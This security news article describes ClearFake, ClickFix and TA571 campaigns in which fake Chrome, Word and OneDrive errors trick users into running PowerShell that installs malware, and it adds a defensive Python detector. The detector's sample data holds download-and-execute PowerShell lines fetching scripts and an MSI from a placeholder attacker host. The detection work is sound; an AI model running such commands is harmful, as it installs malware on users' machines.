
A new malicious campaign tricks people by pretending to be Google Chrome, Word, or OneDrive errors. They use these fake alerts to convince users to run harmful PowerShell "fixes" that actually install malware.

This campaign involves several cyber threat groups, including ClearFake and others like ClickFix and TA571. ClearFake has previously used tricks where websites ask users to update their browser, but the update actually installs malware.

In the latest attacks, cybercriminals use JavaScript in email attachments or on compromised websites to display fake error messages that appear to come from Google Chrome, Word, or OneDrive. The messages tell users to click a button that copies a PowerShell "fix" to their clipboard, and then to paste and run that script in a PowerShell window.

Even though these attacks require several user interactions to succeed, the social engineering is convincing enough to make people believe there is a real problem that needs fixing. This may lead users to act quickly without considering the risks, according to a report from Proofpoint.

The malware that Proofpoint found includes DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard-stealing tool, and Lumma Stealer.

Proofpoint researchers observed three attack chains, each with a different starting point. Only the first is not clearly attributed to TA571; it is linked to ClearFake instead. In that chain, users visit a compromised website, which loads a malicious script from the blockchain via Binance's Smart Chain contracts.

This script performs some checks and then displays a fake Google Chrome warning saying there was a problem displaying the web page. The message asks the visitor to install a "root certificate" by copying a PowerShell script to the Windows clipboard and running it in an elevated (administrator) PowerShell console.


Fake Google Chrome error
Source: Proofpoint

When the PowerShell script is executed, it will perform various steps to confirm the device is a valid target, and then it will download additional payloads, as outlined below.

· Flushes the DNS cache.
· Removes clipboard content.
· Displays a decoy message.
· Downloads another remote PowerShell script, which performs anti-VM checks before downloading an info-stealer.

The 'ClearFake' attack chain
Source: Proofpoint

The second attack chain is linked to the 'ClickFix' campaign. The attackers modify compromised websites by injecting an iframe that overlays a fake Google Chrome error message on the page.

Visitors are told to open "Windows PowerShell (Admin)" and paste in the provided code, which leads to the same malware described above.

The third chain is email-based: HTML attachments disguised as Microsoft Word documents prompt users to install the "Word Online" extension to view the document correctly.

The error message offers the options "How to fix" and "Auto-fix". Choosing "How to fix" copies a PowerShell command to the clipboard and instructs the user to paste it into PowerShell.

"Auto-fix" uses the search-ms: protocol handler to display a file hosted on a remote, attacker-controlled share. The file is named "fix.msi" or "fix.vbs".

Fake Microsoft Word error leads to malware
Source: Proofpoint

In these cases, the PowerShell commands download and run either an MSI file or a VBS script, resulting in Matanbuchus or DarkGate infections.
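As an added defensive example (not code from the Proofpoint report or from this article), the Python below rates PowerShell script-block log text against the behaviours described on this page: the DNS flush, clipboard clearing and decoy message of the ClearFake chain, and the download-and-run of an MSI or VBS "fix" from the Word variant. The sample log entries and the PLACEHOLDER host names are constructed for illustration.

```python
import re

# Behaviours the report attributes to the pasted "fix" scripts, as regexes
# over PowerShell script-block text (e.g. Event ID 4104 ScriptBlockText).
INDICATORS = {
    "dns_flush": re.compile(r"Clear-DnsClientCache|ipconfig(\.exe)?\s+/flushdns", re.I),
    "clipboard_clear": re.compile(r"Set-Clipboard|\[[\w.]*Clipboard\]::(Clear|SetText)|\|\s*clip(\.exe)?\b", re.I),
    "decoy_message": re.compile(r"Write-Host|Write-Output|MessageBox\]::Show", re.I),
    "remote_download": re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer", re.I),
    "execute_payload": re.compile(r"Invoke-Expression|\biex\b|msiexec|wscript|cscript|Start-Process", re.I),
}

# Constructed sample script blocks (not real telemetry). PLACEHOLDER-C2 stands
# in for an attacker-controlled host; the last two entries are benign admin work.
SAMPLE_SCRIPT_BLOCKS = [
    r"Clear-DnsClientCache; Set-Clipboard -Value ' '; Write-Host 'Certificate installed, reload the page'; iex (iwr -UseBasicParsing 'http://PLACEHOLDER-C2/stage2.ps1')",
    r"iwr 'http://PLACEHOLDER-C2/fix.msi' -OutFile $env:TEMP\fix.msi; msiexec /i $env:TEMP\fix.msi /qn",
    r"Clear-DnsClientCache; Resolve-DnsName intranet.example.local",
    r"Invoke-WebRequest -Uri 'https://intranet.example/tool.zip' -OutFile tool.zip",
]


def match_indicators(script_block):
    """Return the set of indicator names whose pattern occurs in the block."""
    return {name for name, rx in INDICATORS.items() if rx.search(script_block)}


def risk_level(script_block):
    """Rate one script block against the chains described in the report.

    high   : remote download + execution, plus at least two of the DNS-flush,
             clipboard-clear and decoy-message steps of the ClearFake chain
    medium : remote download + execution only (the MSI/VBS "fix" pattern)
    low    : anything else, including a lone DNS flush or a plain download
    """
    found = match_indicators(script_block)
    if {"remote_download", "execute_payload"} <= found:
        housekeeping = found & {"dns_flush", "clipboard_clear", "decoy_message"}
        return "high" if len(housekeeping) >= 2 else "medium"
    return "low"


def scan(script_blocks):
    """Return (index, level, sorted indicators) for each block rated above low."""
    results = []
    for i, block in enumerate(script_blocks):
        level = risk_level(block)
        if level != "low":
            results.append((i, level, sorted(match_indicators(block))))
    return results


if __name__ == "__main__":
    for idx, level, names in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: {level} ({', '.join(names)})")
```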

In all cases, the attackers rely on users not recognizing the danger of running PowerShell commands on their computers.

They also rely on Windows not always detecting and blocking the malicious actions initiated by the pasted code.

These varied attack methods show that TA571 is actively experimenting with different techniques to become more effective and to find more ways to infect more systems.
